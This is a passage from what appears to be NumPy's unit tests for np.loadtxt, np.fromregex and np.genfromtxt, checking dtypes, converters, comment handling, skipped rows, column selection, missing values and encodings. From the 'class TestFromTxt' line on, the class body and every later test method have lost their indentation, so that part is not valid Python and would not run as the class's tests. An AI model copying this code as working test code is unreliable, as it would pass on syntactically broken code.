        assert_array_equal(data, [33, 66])

    def test_dtype_with_object(self):
        # Test using an explicit dtype with an object
        data = """ 1; 2001-01-01
                   2; 2002-01-31 """
        ndtype = [('idx', int), ('code', object)]
        func = lambda s: strptime(s.strip(), "%Y-%m-%d")
        converters = {1: func}
        test = np.loadtxt(TextIO(data), delimiter=";", dtype=ndtype,
                          converters=converters)
        control = np.array(
            [(1, datetime(2001, 1, 1)), (2, datetime(2002, 1, 31))],
            dtype=ndtype)
        assert_equal(test, control)

    def test_uint64_type(self):
        # Values above int64 range must survive the uint64 path.
        tgt = (9223372043271415339, 9223372043271415853)
        c = TextIO()
        c.write("%s %s" % tgt)
        c.seek(0)
        res = np.loadtxt(c, dtype=np.uint64)
        assert_equal(res, tgt)

    def test_int64_type(self):
        tgt = (-9223372036854775807, 9223372036854775807)
        c = TextIO()
        c.write("%s %s" % tgt)
        c.seek(0)
        res = np.loadtxt(c, dtype=np.int64)
        assert_equal(res, tgt)

    def test_from_float_hex(self):
        # IEEE doubles and floats only, otherwise the float32
        # conversion may fail.
        tgt = np.logspace(-10, 10, 5).astype(np.float32)
        tgt = np.hstack((tgt, -tgt)).astype(float)
        inp = '\n'.join(map(float.hex, tgt))
        c = TextIO()
        c.write(inp)
        for dt in [float, np.float32]:
            c.seek(0)
            res = np.loadtxt(c, dtype=dt)
            assert_equal(res, tgt, err_msg="%s" % dt)

    def test_from_complex(self):
        tgt = (complex(1, 1), complex(1, -1))
        c = TextIO()
        c.write("%s %s" % tgt)
        c.seek(0)
        res = np.loadtxt(c, dtype=complex)
        assert_equal(res, tgt)

    def test_complex_misformatted(self):
        # test for backward compatibility
        # some complex formats used to generate x+-yj
        a = np.zeros((2, 2), dtype=np.complex128)
        re = np.pi
        im = np.e
        a[:] = re - 1.0j * im
        c = BytesIO()
        np.savetxt(c, a, fmt='%.16e')
        c.seek(0)
        txt = c.read()
        c.seek(0)
        # misformat the sign on the imaginary part, gh 7895
        txt_bad = txt.replace(b'e+00-', b'e00+-')
        assert_(txt_bad != txt)
        c.write(txt_bad)
        c.seek(0)
        res = np.loadtxt(c, dtype=complex)
        assert_equal(res, a)

    def test_universal_newline(self):
        # Old-Mac '\r' line endings must be handled transparently.
        with temppath() as name:
            with open(name, 'w') as f:
                f.write('1 21\r3 42\r')
            data = np.loadtxt(name)
        assert_array_equal(data, [[1, 21], [3, 42]])

    def test_empty_field_after_tab(self):
        c = TextIO()
        c.write('1 \t2 \t3\tstart \n4\t5\t6\t  \n7\t8\t9.5\t')
        c.seek(0)
        dt = {'names': ('x', 'y', 'z', 'comment'),
              'formats': ('<i4', '<i4', '<f4', '|S8')}
        x = np.loadtxt(c, dtype=dt, delimiter='\t')
        a = np.array([b'start ', b'  ', b''])
        assert_array_equal(x['comment'], a)

    def test_structure_unpack(self):
        txt = TextIO("M 21 72\nF 35 58")
        dt = {'names': ('a', 'b', 'c'), 'formats': ('|S1', '<i4', '<f4')}
        a, b, c = np.loadtxt(txt, dtype=dt, unpack=True)
        assert_(a.dtype.str == '|S1')
        assert_(b.dtype.str == '<i4')
        assert_(c.dtype.str == '<f4')
        assert_array_equal(a, np.array([b'M', b'F']))
        assert_array_equal(b, np.array([21, 35]))
        assert_array_equal(c, np.array([72.,  58.]))

    def test_ndmin_keyword(self):
        c = TextIO()
        c.write('1,2,3\n4,5,6')
        c.seek(0)
        assert_raises(ValueError, np.loadtxt, c, ndmin=3)
        c.seek(0)
        assert_raises(ValueError, np.loadtxt, c, ndmin=1.5)
        c.seek(0)
        x = np.loadtxt(c, dtype=int, delimiter=',', ndmin=1)
        a = np.array([[1, 2, 3], [4, 5, 6]])
        assert_array_equal(x, a)

        d = TextIO()
        d.write('0,1,2')
        d.seek(0)
        x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=2)
        assert_(x.shape == (1, 3))
        d.seek(0)
        x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=1)
        assert_(x.shape == (3,))
        d.seek(0)
        x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=0)
        assert_(x.shape == (3,))

        e = TextIO()
        e.write('0\n1\n2')
        e.seek(0)
        x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=2)
        assert_(x.shape == (3, 1))
        e.seek(0)
        x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=1)
        assert_(x.shape == (3,))
        e.seek(0)
        x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=0)
        assert_(x.shape == (3,))

        # Test ndmin kw with empty file.
        with suppress_warnings() as sup:
            sup.filter(message="loadtxt: Empty input file:")
            f = TextIO()
            assert_(np.loadtxt(f, ndmin=2).shape == (0, 1,))
            assert_(np.loadtxt(f, ndmin=1).shape == (0,))

    def test_generator_source(self):
        def count():
            for i in range(10):
                yield "%d" % i

        res = np.loadtxt(count())
        assert_array_equal(res, np.arange(10))

    def test_bad_line(self):
        c = TextIO()
        c.write('1 2 3\n4 5 6\n2 3')
        c.seek(0)

        # Check for exception and that exception contains line number
        assert_raises_regex(ValueError, "3", np.loadtxt, c)

    def test_none_as_string(self):
        # gh-5155, None should work as string when format demands it
        c = TextIO()
        c.write('100,foo,200\n300,None,400')
        c.seek(0)
        dt = np.dtype([('x', int), ('a', 'S10'), ('y', int)])
        np.loadtxt(c, delimiter=',', dtype=dt, comments=None)  # Should succeed

    @pytest.mark.skipif(locale.getpreferredencoding() == 'ANSI_X3.4-1968',
                        reason="Wrong preferred encoding")
    def test_binary_load(self):
        butf8 = b"5,6,7,\xc3\x95scarscar\n\r15,2,3,hello\n\r"\
                b"20,2,3,\xc3\x95scar\n\r"
        sutf8 = butf8.decode("UTF-8").replace("\r", "").splitlines()
        with temppath() as path:
            with open(path, "wb") as f:
                f.write(butf8)
            with open(path, "rb") as f:
                x = np.loadtxt(f, encoding="UTF-8", dtype=np.unicode_)
                assert_array_equal(x, sutf8)
            # test broken latin1 conversion people now rely on
            with open(path, "rb") as f:
                x = np.loadtxt(f, encoding="UTF-8", dtype="S")
            x = [b'5,6,7,\xc3\x95scarscar', b'15,2,3,hello', b'20,2,3,\xc3\x95scar']
            assert_array_equal(x, np.array(x, dtype="S"))

    def test_max_rows(self):
        c = TextIO()
        c.write('1,2,3,5\n4,5,7,8\n2,1,4,5')
        c.seek(0)
        x = np.loadtxt(c, dtype=int, delimiter=',',
                       max_rows=1)
        a = np.array([1, 2, 3, 5], int)
        assert_array_equal(x, a)

    def test_max_rows_with_skiprows(self):
        c = TextIO()
        c.write('comments\n1,2,3,5\n4,5,7,8\n2,1,4,5')
        c.seek(0)
        x = np.loadtxt(c, dtype=int, delimiter=',',
                       skiprows=1, max_rows=1)
        a = np.array([1, 2, 3, 5], int)
        assert_array_equal(x, a)

        c = TextIO()
        c.write('comment\n1,2,3,5\n4,5,7,8\n2,1,4,5')
        c.seek(0)
        x = np.loadtxt(c, dtype=int, delimiter=',',
                       skiprows=1, max_rows=2)
        a = np.array([[1, 2, 3, 5], [4, 5, 7, 8]], int)
        assert_array_equal(x, a)

    def test_max_rows_with_read_continuation(self):
        c = TextIO()
        c.write('1,2,3,5\n4,5,7,8\n2,1,4,5')
        c.seek(0)
        x = np.loadtxt(c, dtype=int, delimiter=',',
                       max_rows=2)
        a = np.array([[1, 2, 3, 5], [4, 5, 7, 8]], int)
        assert_array_equal(x, a)
        # test continuation
        x = np.loadtxt(c, dtype=int, delimiter=',')
        a = np.array([2,1,4,5], int)
        assert_array_equal(x, a)

    def test_max_rows_larger(self):
        #test max_rows > num rows
        c = TextIO()
        c.write('comment\n1,2,3,5\n4,5,7,8\n2,1,4,5')
        c.seek(0)
        x = np.loadtxt(c, dtype=int, delimiter=',',
                       skiprows=1, max_rows=6)
        a = np.array([[1, 2, 3, 5], [4, 5, 7, 8], [2, 1, 4, 5]], int)
        assert_array_equal(x, a)
class Testfromregex(object):
    """Tests for ``np.fromregex`` with string and pre-compiled patterns."""

    def test_record(self):
        c = TextIO()
        c.write('1.312 foo\n1.534 bar\n4.444 qux')
        c.seek(0)

        dt = [('num', np.float64), ('val', 'S3')]
        x = np.fromregex(c, r"([0-9.]+)\s+(...)", dt)
        a = np.array([(1.312, 'foo'), (1.534, 'bar'), (4.444, 'qux')],
                     dtype=dt)
        assert_array_equal(x, a)

    def test_record_2(self):
        c = TextIO()
        c.write('1312 foo\n1534 bar\n4444 qux')
        c.seek(0)

        dt = [('num', np.int32), ('val', 'S3')]
        x = np.fromregex(c, r"(\d+)\s+(...)", dt)
        a = np.array([(1312, 'foo'), (1534, 'bar'), (4444, 'qux')],
                     dtype=dt)
        assert_array_equal(x, a)

    def test_record_3(self):
        # A single capture group yields a one-field structured array.
        c = TextIO()
        c.write('1312 foo\n1534 bar\n4444 qux')
        c.seek(0)

        dt = [('num', np.float64)]
        x = np.fromregex(c, r"(\d+)\s+...", dt)
        a = np.array([(1312,), (1534,), (4444,)], dtype=dt)
        assert_array_equal(x, a)

    def test_record_unicode(self):
        utf8 = b'\xcf\x96'
        with temppath() as path:
            with open(path, 'wb') as f:
                f.write(b'1.312 foo' + utf8 + b' \n1.534 bar\n4.444 qux')

            dt = [('num', np.float64), ('val', 'U4')]
            x = np.fromregex(path, r"(?u)([0-9.]+)\s+(\w+)", dt, encoding='UTF-8')
            a = np.array([(1.312, 'foo' + utf8.decode('UTF-8')), (1.534, 'bar'),
                          (4.444, 'qux')], dtype=dt)
            assert_array_equal(x, a)

            # A pre-compiled pattern must behave the same as a string one.
            regexp = re.compile(r"([0-9.]+)\s+(\w+)", re.UNICODE)
            x = np.fromregex(path, regexp, dt, encoding='UTF-8')
            assert_array_equal(x, a)

    def test_compiled_bytes(self):
        regexp = re.compile(b'(\\d)')
        c = BytesIO(b'123')
        dt = [('num', np.float64)]
        a = np.array([1, 2, 3], dtype=dt)
        x = np.fromregex(c, regexp, dt)
        assert_array_equal(x, a)
#####--------------------------------------------------------------------------
class TestFromTxt(LoadTxtBase):
loadfunc = staticmethod(np.genfromtxt)
def test_record(self):
    # Test w/ explicit dtype
    data = TextIO('1 2\n3 4')
    test = np.genfromtxt(data, dtype=[('x', np.int32), ('y', np.int32)])
    control = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
    assert_equal(test, control)
    # Structured dtype given as a dict descriptor.
    data = TextIO('M 64.0 75.0\nF 25.0 60.0')
    descriptor = {'names': ('gender', 'age', 'weight'),
                  'formats': ('S1', 'i4', 'f4')}
    control = np.array([('M', 64.0, 75.0), ('F', 25.0, 60.0)],
                       dtype=descriptor)
    test = np.genfromtxt(data, dtype=descriptor)
    assert_equal(test, control)
def test_array(self):
    # Test outputting a standard ndarray
    data = TextIO('1 2\n3 4')
    control = np.array([[1, 2], [3, 4]], dtype=int)
    test = np.genfromtxt(data, dtype=int)
    assert_array_equal(test, control)
    # Same data as floats, read back via loadtxt this time.
    data.seek(0)
    control = np.array([[1, 2], [3, 4]], dtype=float)
    test = np.loadtxt(data, dtype=float)
    assert_array_equal(test, control)
def test_1D(self):
    # genfromtxt squeezes single-column / single-row input down to 1-D.
    expected = np.array([1, 2, 3, 4], int)
    # One value per line.
    result = np.genfromtxt(TextIO('1\n2\n3\n4\n'), dtype=int)
    assert_array_equal(result, expected)
    # All values on one delimited line.
    result = np.genfromtxt(TextIO('1,2,3,4\n'), dtype=int, delimiter=',')
    assert_array_equal(result, expected)
def test_comments(self):
    # Comments are stripped whether they occupy a whole line or trail
    # the data on the same line.
    expected = np.array([1, 2, 3, 5], int)
    for text in ('# comment\n1,2,3,5\n', '1,2,3,5# comment\n'):
        result = np.genfromtxt(TextIO(text), dtype=int, delimiter=',',
                               comments='#')
        assert_equal(result, expected)
def test_skiprows(self):
    # Test row skipping
    control = np.array([1, 2, 3, 5], int)
    kwargs = dict(dtype=int, delimiter=',')
    # genfromtxt spells the option 'skip_header' ...
    data = TextIO('comment\n1,2,3,5\n')
    test = np.genfromtxt(data, skip_header=1, **kwargs)
    assert_equal(test, control)
    # ... while loadtxt spells it 'skiprows'.
    data = TextIO('# comment\n1,2,3,5\n')
    test = np.loadtxt(data, skiprows=1, **kwargs)
    assert_equal(test, control)
def test_skip_footer(self):
    # 5 comment lines, one names line, then 51 data rows; the last 10
    # rows (including the malformed trailing "99,99") are dropped by
    # skip_footer, leaving 41 valid rows.
    data = ["# %i" % i for i in range(1, 6)]
    data.append("A, B, C")
    data.extend(["%i,%3.1f,%03s" % (i, i, i) for i in range(51)])
    data[-1] = "99,99"
    kwargs = dict(delimiter=",", names=True, skip_header=5, skip_footer=10)
    test = np.genfromtxt(TextIO("\n".join(data)), **kwargs)
    ctrl = np.array([("%f" % i, "%f" % i, "%f" % i) for i in range(41)],
                    dtype=[(_, float) for _ in "ABC"])
    assert_equal(test, ctrl)
def test_skip_footer_with_invalid(self):
    # Interplay of skip_footer with rows that have a missing column.
    with suppress_warnings() as sup:
        sup.filter(ConversionWarning)
        basestr = '1 1\n2 2\n3 3\n4 4\n5 \n6 \n7 \n'
        # Footer too small to get rid of all invalid values
        assert_raises(ValueError, np.genfromtxt,
                      TextIO(basestr), skip_footer=1)
        # With invalid_raise=False the bad trailing rows are dropped.
        a = np.genfromtxt(
            TextIO(basestr), skip_footer=1, invalid_raise=False)
        assert_equal(a, np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]]))
        # A footer large enough removes all invalid rows by itself.
        a = np.genfromtxt(TextIO(basestr), skip_footer=3)
        assert_equal(a, np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]]))
        # Invalid rows interleaved with valid ones: skip_footer counts
        # raw lines from the end, invalid rows elsewhere are dropped.
        basestr = '1 1\n2 \n3 3\n4 4\n5 \n6 6\n7 7\n'
        a = np.genfromtxt(
            TextIO(basestr), skip_footer=1, invalid_raise=False)
        assert_equal(a, np.array([[1., 1.], [3., 3.], [4., 4.], [6., 6.]]))
        a = np.genfromtxt(
            TextIO(basestr), skip_footer=3, invalid_raise=False)
        assert_equal(a, np.array([[1., 1.], [3., 3.], [4., 4.]]))
def test_header(self):
    # Test retrieving a header
    data = TextIO('gender age weight\nM 64.0 75.0\nF 25.0 60.0')
    with warnings.catch_warnings(record=True) as w:
        warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
        # dtype=None here is expected to emit a VisibleDeprecationWarning.
        test = np.genfromtxt(data, dtype=None, names=True)
        assert_(w[0].category is np.VisibleDeprecationWarning)
    control = {'gender': np.array([b'M', b'F']),
               'age': np.array([64.0, 25.0]),
               'weight': np.array([75.0, 60.0])}
    assert_equal(test['gender'], control['gender'])
    assert_equal(test['age'], control['age'])
    assert_equal(test['weight'], control['weight'])
def test_auto_dtype(self):
    # Test the automatic definition of the output dtype
    data = TextIO('A 64 75.0 3+4j True\nBCD 25 60.0 5+6j False')
    with warnings.catch_warnings(record=True) as w:
        warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
        test = np.genfromtxt(data, dtype=None)
        assert_(w[0].category is np.VisibleDeprecationWarning)
    # One column each of bytes, int, float, complex and bool.
    control = [np.array([b'A', b'BCD']),
               np.array([64, 25]),
               np.array([75.0, 60.0]),
               np.array([3 + 4j, 5 + 6j]),
               np.array([True, False]), ]
    assert_equal(test.dtype.names, ['f0', 'f1', 'f2', 'f3', 'f4'])
    for (i, ctrl) in enumerate(control):
        assert_equal(test['f%i' % i], ctrl)
def test_auto_dtype_uniform(self):
    # With dtype=None and homogeneous columns the result is a plain
    # 2-D integer array, not a structured one.
    result = np.genfromtxt(TextIO('1 2 3 4\n5 6 7 8\n'), dtype=None)
    assert_equal(result, np.array([[1, 2, 3, 4], [5, 6, 7, 8]]))
def test_fancy_dtype(self):
    # A nested (record-in-record) dtype must survive the round trip.
    nested = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
    result = np.genfromtxt(TextIO('1,2,3.0\n4,5,6.0\n'),
                           dtype=nested, delimiter=',')
    expected = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dtype=nested)
    assert_equal(result, expected)
def test_names_overwrite(self):
    # Test overwriting the names of the dtype
    descriptor = {'names': ('g', 'a', 'w'),
                  'formats': ('S1', 'i4', 'f4')}
    data = TextIO(b'M 64.0 75.0\nF 25.0 60.0')
    names = ('gender', 'age', 'weight')
    test = np.genfromtxt(data, dtype=descriptor, names=names)
    # The names argument takes precedence over the dtype's own names.
    descriptor['names'] = names
    control = np.array([('M', 64.0, 75.0),
                        ('F', 25.0, 60.0)], dtype=descriptor)
    assert_equal(test, control)
def test_commented_header(self):
    # Check that names can be retrieved even if the line is commented out.
    data = TextIO("""
#gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
    # The # is part of the first name and should be deleted automatically.
    with warnings.catch_warnings(record=True) as w:
        warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
        test = np.genfromtxt(data, names=True, dtype=None)
        assert_(w[0].category is np.VisibleDeprecationWarning)
    ctrl = np.array([('M', 21, 72.1), ('F', 35, 58.33), ('M', 33, 21.99)],
                    dtype=[('gender', '|S1'), ('age', int), ('weight', float)])
    assert_equal(test, ctrl)
    # Ditto, but with a space after '#': the standalone comment marker
    # should be dropped from the names line entirely.
    data = TextIO(b"""
# gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
    with warnings.catch_warnings(record=True) as w:
        warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
        test = np.genfromtxt(data, names=True, dtype=None)
        assert_(w[0].category is np.VisibleDeprecationWarning)
    assert_equal(test, ctrl)
def test_names_and_comments_none(self):
    # names=True must still work when comments is None (gh-10780).
    stream = TextIO('col1 col2\n 1 2\n 3 4')
    result = np.genfromtxt(stream, dtype=(int, int), comments=None,
                           names=True)
    expected = np.array([(1, 2), (3, 4)],
                        dtype=[('col1', int), ('col2', int)])
    assert_equal(result, expected)
def test_file_is_closed_on_error(self):
    # gh-13200: the input file must be closed even when decoding fails.
    with tempdir() as tmpdir:
        fpath = os.path.join(tmpdir, "test.csv")
        with open(fpath, "wb") as f:
            # Non-ASCII byte sequence that cannot decode as ascii.
            f.write(u'\N{GREEK PI SYMBOL}'.encode('utf8'))
        # ResourceWarnings are emitted from a destructor, so won't be
        # detected by regular propagation to errors.
        with assert_no_warnings():
            with pytest.raises(UnicodeDecodeError):
                np.genfromtxt(fpath, encoding="ascii")
def test_autonames_and_usecols(self):
    # Tests names and usecols
    data = TextIO('A B C D\n aaaa 121 45 9.1')
    with warnings.catch_warnings(record=True) as w:
        warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
        # Columns are selected by the names read from the header line.
        test = np.genfromtxt(data, usecols=('A', 'C', 'D'),
                             names=True, dtype=None)
        assert_(w[0].category is np.VisibleDeprecationWarning)
    control = np.array(('aaaa', 45, 9.1),
                       dtype=[('A', '|S4'), ('C', int), ('D', float)])
    assert_equal(test, control)
def test_converters_with_usecols(self):
    # A converter keyed by absolute column index must still apply when
    # only a subset of the columns is selected.
    stream = TextIO('1,2,3,,5\n6,7,8,9,10\n')
    result = np.genfromtxt(stream, dtype=int, delimiter=',',
                           converters={3: lambda s: int(s or - 999)},
                           usecols=(1, 3,))
    assert_equal(result, np.array([[2, -999], [7, 9]], int))
def test_converters_with_usecols_and_names(self):
    # Tests names and usecols
    data = TextIO('A B C D\n aaaa 121 45 9.1')
    with warnings.catch_warnings(record=True) as w:
        warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
        # Converters may be keyed by column name as well as by index.
        test = np.genfromtxt(data, usecols=('A', 'C', 'D'), names=True,
                             dtype=None,
                             converters={'C': lambda s: 2 * int(s)})
        assert_(w[0].category is np.VisibleDeprecationWarning)
    control = np.array(('aaaa', 90, 9.1),
                       dtype=[('A', '|S4'), ('C', int), ('D', float)])
    assert_equal(test, control)
def test_converters_cornercases(self):
    # Test the conversion to datetime.
    converter = {
        'date': lambda s: strptime(s, '%Y-%m-%d %H:%M:%SZ')}
    data = TextIO('2009-02-03 12:00:00Z, 72214.0')
    test = np.genfromtxt(data, delimiter=',', dtype=None,
                         names=['date', 'stid'], converters=converter)
    # The datetime object ends up in an object-dtype field.
    control = np.array((datetime(2009, 2, 3), 72214.),
                       dtype=[('date', np.object_), ('stid', float)])
    assert_equal(test, control)
def test_converters_cornercases2(self):
    # Test the conversion to datetime64.
    converter = {
        'date': lambda s: np.datetime64(strptime(s, '%Y-%m-%d %H:%M:%SZ'))}
    data = TextIO('2009-02-03 12:00:00Z, 72214.0')
    test = np.genfromtxt(data, delimiter=',', dtype=None,
                         names=['date', 'stid'], converters=converter)
    # The converter's datetime64 value determines the field dtype.
    control = np.array((datetime(2009, 2, 3), 72214.),
                       dtype=[('date', 'datetime64[us]'), ('stid', float)])
    assert_equal(test, control)
def test_unused_converter(self):
    # Test whether unused converters are forgotten
    data = TextIO("1 21\n 3 42\n")
    # The converter for column 0 must be ignored: only column 1 is read.
    test = np.genfromtxt(data, usecols=(1,),
                         converters={0: lambda s: int(s, 16)})
    assert_equal(test, [21, 42])
    # Here the converter does apply: '21' and '42' parsed as hexadecimal.
    data.seek(0)
    test = np.genfromtxt(data, usecols=(1,),
                         converters={1: lambda s: int(s, 16)})
    assert_equal(test, [33, 66])
def test_invalid_converter(self):
    # Converters that fail on some of the entries must surface as a
    # ConverterError rather than producing a bogus array.
    strip_rand = lambda x: float((b'r' in x.lower() and x.split()[-1]) or
                                 (b'r' not in x.lower() and x.strip() or 0.0))
    strip_per = lambda x: float((b'%' in x.lower() and x.split()[0]) or
                                (b'%' not in x.lower() and x.strip() or 0.0))
    s = TextIO("D01N01,10/1/2003 ,1 %,R 75,400,600\r\n"
               "L24U05,12/5/2003, 2 %,1,300, 150.5\r\n"
               "D02N03,10/10/2004,R 1,,7,145.55")
    kwargs = dict(
        converters={2: strip_per, 3: strip_rand}, delimiter=",",
        dtype=None)
    assert_raises(ConverterError, np.genfromtxt, s, **kwargs)
def test_tricky_converter_bug1666(self):
    # Converter on column 0 strips the leading 'q' (gh-1666 corner case).
    strip_q = lambda field: float(field[1:])
    result = np.genfromtxt(TextIO('q1,2\nq3,4'), delimiter=',',
                           converters={0: strip_q})
    assert_equal(result, np.array([[1., 2.], [3., 4.]]))
def test_dtype_with_converters(self):
    dstr = "2009; 23; 46"
    # A converter may override the declared dtype for its column (bytes
    # here), which turns the result into a structured array.
    test = np.genfromtxt(TextIO(dstr,),
                         delimiter=";", dtype=float, converters={0: bytes})
    control = np.array([('2009', 23., 46)],
                       dtype=[('f0', '|S4'), ('f1', float), ('f2', float)])
    assert_equal(test, control)
    # A converter consistent with the dtype keeps a plain float array.
    test = np.genfromtxt(TextIO(dstr,),
                         delimiter=";", dtype=float, converters={0: float})
    control = np.array([2009., 23., 46],)
    assert_equal(test, control)
def test_dtype_with_converters_and_usecols(self):
    dstr = "1,5,-1,1:1\n2,8,-1,1:n\n3,3,-2,m:n\n"
    # Map the textual labels of the last column onto small integers.
    dmap = {'1:1':0, '1:n':1, 'm:1':2, 'm:n':3}
    dtyp = [('e1','i4'),('e2','i4'),('e3','i2'),('n', 'i1')]
    conv = {0: int, 1: int, 2: int, 3: lambda r: dmap[r.decode()]}
    test = np.recfromcsv(TextIO(dstr,), dtype=dtyp, delimiter=',',
                         names=None, converters=conv)
    control = np.rec.array([(1,5,-1,0), (2,8,-1,1), (3,3,-2,3)], dtype=dtyp)
    assert_equal(test, control)
    # Same but skipping column 2: converter keys still refer to the
    # original column indices.
    dtyp = [('e1','i4'),('e2','i4'),('n', 'i1')]
    test = np.recfromcsv(TextIO(dstr,), dtype=dtyp, delimiter=',',
                         usecols=(0,1,3), names=None, converters=conv)
    control = np.rec.array([(1,5,0), (2,8,1), (3,3,3)], dtype=dtyp)
    assert_equal(test, control)
def test_dtype_with_object(self):
    # Test using an explicit dtype with an object
    data = """ 1; 2001-01-01
               2; 2002-01-31 """
    ndtype = [('idx', int), ('code', object)]
    func = lambda s: strptime(s.strip(), "%Y-%m-%d")
    converters = {1: func}
    test = np.genfromtxt(TextIO(data), delimiter=";", dtype=ndtype,
                         converters=converters)
    control = np.array(
        [(1, datetime(2001, 1, 1)), (2, datetime(2002, 1, 31))],
        dtype=ndtype)
    assert_equal(test, control)
    # A nested field containing an object dtype is rejected ...
    ndtype = [('nest', [('idx', int), ('code', object)])]
    with assert_raises_regex(NotImplementedError,
                             'Nested fields.* not supported.*'):
        test = np.genfromtxt(TextIO(data), delimiter=";",
                             dtype=ndtype, converters=converters)
    # nested but empty fields also aren't supported
    ndtype = [('idx', int), ('code', object), ('nest', [])]
    with assert_raises_regex(NotImplementedError,
                             'Nested fields.* not supported.*'):
        test = np.genfromtxt(TextIO(data), delimiter=";",
                             dtype=ndtype, converters=converters)
def test_userconverters_with_explicit_dtype(self):
    # Test user_converters w/ explicit (standard) dtype
    data = TextIO('skip,skip,2001-01-01,1.0,skip')
    test = np.genfromtxt(data, delimiter=",", names=None, dtype=float,
                         usecols=(2, 3), converters={2: bytes})
    # The converted column becomes a bytes field next to the float one.
    control = np.array([('2001-01-01', 1.)],
                       dtype=[('', '|S10'), ('', float)])
    assert_equal(test, control)
def test_utf8_userconverters_with_explicit_dtype(self):
    # Non-latin1 bytes in the file must survive a unicode converter.
    utf8 = b'\xcf\x96'
    with temppath() as path:
        with open(path, 'wb') as f:
            f.write(b'skip,skip,2001-01-01' + utf8 + b',1.0,skip')
        test = np.genfromtxt(path, delimiter=",", names=None, dtype=float,
                             usecols=(2, 3), converters={2: np.compat.unicode},
                             encoding='UTF-8')
    control = np.array([('2001-01-01' + utf8.decode('UTF-8'), 1.)],
                       dtype=[('', '|U11'), ('', float)])
    assert_equal(test, control)
def test_spacedelimiter(self):
    # Whitespace is the default delimiter when none is given.
    result = np.genfromtxt(TextIO("1 2 3 4 5\n6 7 8 9 10"))
    expected = np.array([[1., 2., 3., 4., 5.],
                         [6., 7., 8., 9., 10.]])
    assert_equal(result, expected)
def test_integer_delimiter(self):
    # An integer delimiter means fixed-width fields of that many chars.
    text = "  1  2  3\n  4  5 67\n890123  4"
    result = np.genfromtxt(TextIO(text), delimiter=3)
    expected = np.array([[1, 2, 3], [4, 5, 67], [890, 123, 4]])
    assert_equal(result, expected)
def test_missing(self):
    # A converter can supply a substitute value for an empty field.
    result = np.genfromtxt(TextIO('1,2,3,,5\n'), dtype=int, delimiter=',',
                           converters={3: lambda s: int(s or - 999)})
    assert_equal(result, np.array([1, 2, 3, -999, 5], int))
def test_missing_with_tabs(self):
    # Test w/ a delimiter tab
    txt = "1\t2\t3\n\t2\t\n1\t\t3"
    test = np.genfromtxt(TextIO(txt), delimiter="\t",
                         usemask=True,)
    # Empty tab-separated fields become masked NaN entries.
    ctrl_d = np.array([(1, 2, 3), (np.nan, 2, np.nan), (1, np.nan, 3)],)
    ctrl_m = np.array([(0, 0, 0), (1, 0, 1), (0, 1, 0)], dtype=bool)
    assert_equal(test.data, ctrl_d)
    assert_equal(test.mask, ctrl_m)
def test_usecols(self):
    # Test the selection of columns
    # Select 1 column
    control = np.array([[1, 2], [3, 4]], float)
    data = TextIO()
    np.savetxt(data, control)
    data.seek(0)
    test = np.genfromtxt(data, dtype=float, usecols=(1,))
    assert_equal(test, control[:, 1])
    # Select two columns out of three.
    control = np.array([[1, 2, 3], [3, 4, 5]], float)
    data = TextIO()
    np.savetxt(data, control)
    data.seek(0)
    test = np.genfromtxt(data, dtype=float, usecols=(1, 2))
    assert_equal(test, control[:, 1:])
    # Testing with arrays instead of tuples.
    data.seek(0)
    test = np.genfromtxt(data, dtype=float, usecols=np.array([1, 2]))
    assert_equal(test, control[:, 1:])
def test_usecols_as_css(self):
    # usecols may be given as a single comma-separated string of names.
    result = np.genfromtxt(TextIO("1 2 3\n4 5 6"),
                           names="a, b, c", usecols="a, c")
    expected = np.array([(1, 3), (4, 6)],
                        dtype=[(_, float) for _ in "ac"])
    assert_equal(result, expected)
def test_usecols_with_structured_dtype(self):
    # Test usecols with an explicit structured dtype
    data = TextIO("JOE 70.1 25.3\nBOB 60.5 27.9")
    names = ['stid', 'temp']
    dtypes = ['S4', 'f8']
    # Columns 0 and 2 map onto the two fields of the dtype, in order.
    test = np.genfromtxt(
        data, usecols=(0, 2), dtype=list(zip(names, dtypes)))
    assert_equal(test['stid'], [b"JOE", b"BOB"])
    assert_equal(test['temp'], [25.3, 27.9])
def test_usecols_with_integer(self):
    # A bare integer selects a single column and yields a 1-D result.
    result = np.genfromtxt(TextIO(b"1 2 3\n4 5 6"), usecols=0)
    assert_equal(result, np.array([1., 4.]))
def test_usecols_with_named_columns(self):
    # Test usecols with named columns
    ctrl = np.array([(1, 3), (4, 6)], dtype=[('a', float), ('c', float)])
    data = "1 2 3\n4 5 6"
    kwargs = dict(names="a, b, c")
    # Negative indices count from the last column.
    test = np.genfromtxt(TextIO(data), usecols=(0, -1), **kwargs)
    assert_equal(test, ctrl)
    # Column names may be used instead of indices.
    test = np.genfromtxt(TextIO(data),
                         usecols=('a', 'c'), **kwargs)
    assert_equal(test, ctrl)
def test_empty_file(self):
    # Test that an empty file raises the proper warning.
    with suppress_warnings() as sup:
        sup.filter(message="genfromtxt: Empty input file:")
        data = TextIO()
        # An empty input yields an empty array, not an error.
        test = np.genfromtxt(data)
        assert_equal(test, np.array([]))
        # when skip_header > 0
        test = np.genfromtxt(data, skip_header=1)
        assert_equal(test, np.array([]))
def test_fancy_dtype_alt(self):
    # Nested dtype combined with usemask: result is a masked record array.
    nested = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
    result = np.genfromtxt(TextIO('1,2,3.0\n4,5,6.0\n'),
                           dtype=nested, delimiter=',', usemask=True)
    expected = ma.array([(1, (2, 3.0)), (4, (5, 6.0))], dtype=nested)
    assert_equal(result, expected)
def test_shaped_dtype(self):
    # A dtype with a sub-array field ('block' is 2x3) consumes the
